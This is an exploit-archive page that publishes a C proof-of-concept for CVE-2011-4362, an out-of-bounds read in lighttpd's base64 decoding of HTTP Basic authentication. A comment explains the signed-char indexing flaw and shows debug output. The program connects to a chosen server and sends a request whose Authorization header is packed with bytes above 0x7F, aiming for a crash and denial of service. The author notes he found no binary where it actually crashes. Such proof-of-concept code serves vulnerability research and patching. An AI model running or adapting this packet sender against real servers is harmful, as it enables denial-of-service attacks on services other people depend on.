what you don't know can hurt you

Lighttpd 1.4.30 / 1.5 Denial Of Service

Lighttpd 1.4.30 / 1.5 Denial Of Service
Posted Dec 26, 2011
Authored by Adam Zabrocki

Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.

tags | exploit, denial of service
advisories | CVE-2011-4362
MD5 | 795e08f4506c35082c983971a9d04cc2

Lighttpd 1.4.30 / 1.5 Denial Of Service

Change Mirror Download
/*
* Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang
*
* Here the vulnerable code (src/http_auth.c:67)
*
* --- CUT ---
* static const short base64_reverse_table[256] = {
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F
* 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F
* -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F
* 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F
* -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F
* 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF
* };
*
* static unsigned char * base64_decode(buffer *out, const char *in) {
* ...
* int ch, ...;
* size_t i;
* ...
*
* ch = in[i];
* ...
* ch = base64_reverse_table[ch];
* ...
* }
* --- CUT ---
*
* Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.
* This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault
* (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata
* section before the base64_reverse_table table cause this situation.
*
* I have added some extra debug in the lighttpd source code to see if this vulnerability is
* executed correctly. Here is output for one of the example:
*
* --- CUT ---
* ptr[0x9a92c48] size[0xc0] used[0x0]
* 127(. | 0 | 0)
* -128(t | 1 | 0)
* -127(e | 2 | 1)
* -126(' | 3 | 2)
* -125(e | 4 | 3)
* -124(u | 5 | 3)
* -123(r | 6 | 4)
* -122(' | 7 | 5)
* -121(s | 8 | 6)
* -120(c | 9 | 6)
* -119(i | 10 | 7)
* -118(n | 11 | 8)
* -117(i | 12 | 9)
* -116( | 13 | 9)
* -115(a | 14 | 10)
* -114(t | 15 | 11)
* -113(. | 16 | 12)
* -112(e | 17 | 12)
* -111(u | 18 | 13)
* -110(r | 19 | 14)
* -109(' | 20 | 15)
* -108(f | 21 | 15)
* -107(i | 22 | 16)
* -106(e | 23 | 17)
* -105(: | 24 | 18)
* -104(= | 25 | 18)
* -103(o | 26 | 19)
* -102(t | 27 | 20)
* -101(o | 28 | 21)
* -100( | 29 | 21)
* -99(a | 30 | 22)
* -98(g | 31 | 23)
* -97(. | 32 | 24)
* -96(d | 33 | 24)
* -95(g | 34 | 25)
* -94(s | 35 | 26)
* -93(: | 36 | 27)
* -92(u | 37 | 27)
* -91(s | 38 | 28)
* -90(p | 39 | 29)
* -89(o | 40 | 30)
* -88(t | 41 | 30)
* -87(d | 42 | 31)
* -86(b | 43 | 32)
* -85(c | 44 | 33)
* -84(e | 45 | 33)
* -83(d | 46 | 34)
* -82(( | 47 | 35)
* -81(n | 48 | 36)
* -80(y | 49 | 36)
* -79(h | 50 | 37)
* -78(d | 51 | 38)
* -77(g | 52 | 39)
* -76(s | 53 | 39)
* -75( | 54 | 40)
* -74(r | 55 | 41)
* -73(p | 56 | 42)
* -72(a | 57 | 42)
* -71(n | 58 | 43)
* -70(. | 59 | 44)
* -69(. | 60 | 45)
* -68(d | 61 | 45)
* -67(g | 62 | 46)
* -66(s | 63 | 47)
* -65(: | 64 | 48)
* -64(( | 65 | 48)
* -63(d | 66 | 49)
* -62(- | 67 | 50)
* -61(e | 68 | 51)
* -60(s | 69 | 51)
* -59( | 70 | 52)
* -58(i | 71 | 53)
* -57(s | 72 | 54)
* -56(n | 73 | 54)
* -55( | 74 | 55)
* -54(i | 75 | 56)
* -53(l | 76 | 57)
* -52(. | 77 | 57)
* -51(. | 78 | 58)
* -50(k | 79 | 59)
* -49(0 | 80 | 60)
* -48(% | 81 | 60)
* -47(] | 82 | 61)
* -46(p | 83 | 62)
* -45(r | 84 | 63)
* -44(0 | 85 | 63)
* -43(% | 86 | 64)
* -42(] | 87 | 65)
* -41(s | 88 | 66)
* -40(z | 89 | 66)
* -39([ | 90 | 67)
* -38(x | 91 | 68)
* -37(x | 92 | 69)
* -36( | 93 | 69)
* -35(s | 94 | 70)
* -34(d | 95 | 71)
* -33(0 | 96 | 72)
* -32(% | 97 | 72)
* -31(] | 98 | 73)
* -30(. | 99 | 74)
* -29(. | 100 | 75)
* -28(d | 101 | 75)
* -27(c | 102 | 76)
* -26(d | 103 | 77)
* -25(i | 104 | 78)
* -24(g | 105 | 78)
* -23(b | 106 | 79)
* -22(s | 107 | 80)
* -21(6 | 108 | 81)
* -20(- | 109 | 81)
* -19(t | 110 | 82)
* -18(i | 111 | 83)
* -17(g | 112 | 84)
* -16(f | 113 | 84)
* -15(i | 114 | 85)
* -14(e | 115 | 86)
* -13(. | 116 | 87)
* -12(. | 117 | 87)
* -11(. | 118 | 88)
* -10(. | 119 | 89)
* -9(. | 120 | 90)
* -8(. | 121 | 90)
* -7(. | 122 | 91)
* -6(. | 123 | 92)
* -5(. | 124 | 93)
* -4(. | 125 | 93)
* -3(. | 126 | 94)
* -2(. | 127 | 95)
* -1(. | 128 | 96)
* k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
* ptr[0x9a92c48] size[0xc0] used[0x60]
* string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
* --- CUT ---
*
* First column is the offset so vulnerability is executed like it should be
* (negative offsets). Second column is byte which is read out-of-bound.
*
*
* Maybe you can find vulnerable binary?
*
*
* Best regards,
* Adam 'pi3' Zabrocki
*
*
* --
* http://pi3.com.pl
* http://site.pi3.com.pl/exp/p_cve-2011-4362.c
* http://blog.pi3.com.pl/?p=277
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <getopt.h>

#define PORT 80
#define SA struct sockaddr

char header[] =
"GET /%s/ HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Proxy-Connection: keep-alive\r\n"
"Authorization: Basic ";

char header_port[] =
"GET /%s/ HTTP/1.1\r\n"
"Host: %s:%d\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Proxy-Connection: keep-alive\r\n"
"Authorization: Basic ";


int main(int argc, char *argv[]) {

int i=PORT,opt=0,sockfd;
char *remote_dir = NULL;
char *r_hostname = NULL;
struct sockaddr_in servaddr;
struct hostent *h = NULL;
char *buf;
unsigned int len = 0x0;


if (!argv[1])
usage(argv[0]);


printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
printf("\n\t\t[+] Preparing arguments... ");
while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {
switch(opt) {

case 'h':

r_hostname = strdup(optarg);
if ( (h = gethostbyname(r_hostname))==NULL) {
printf("Gethostbyname() field!\n");
exit(-1);
}
break;

case 'p':

i=atoi(optarg);
break;

case 'd':

remote_dir = strdup(optarg);
break;

case '?':

usage(argv[0]);
break;

default:

usage(argv[0]);
break;

}
}

if (!remote_dir || !h) {
usage(argv[0]);
exit(-1);
}

servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(i);
servaddr.sin_addr = *(struct in_addr*)h->h_addr;

len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;
if ( (buf = (char *)malloc(len)) == NULL) {
printf("malloc() :(\n");
exit(-1);
}
memset(buf,0x0,len);

if (i != 80)
snprintf(buf,len,header_port,remote_dir,r_hostname,i);
else
snprintf(buf,len,header,remote_dir,r_hostname);

for (i=0;i<130;i++)
buf[strlen(buf)] = 127+i;

buf[strlen(buf)] = '\r';
buf[strlen(buf)] = '\n';
buf[strlen(buf)] = '\r';
buf[strlen(buf)] = '\n';

printf("OK\n\t\t[+] Creating socket... ");
if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {
printf("Socket() error!\n");
exit(-1);
}

printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname);
if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {
printf("Connect() error!\n");
exit(-1);
}

printf("OK\n\t\t[+] Sending dirty packet... ");
// write(1,buf,strlen(buf));
write(sockfd,buf,strlen(buf));

printf("OK\n\n\t\t[+] Check the website!\n\n");

close(sockfd);

}

int usage(char *arg) {

printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg);
printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n");
exit(0);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close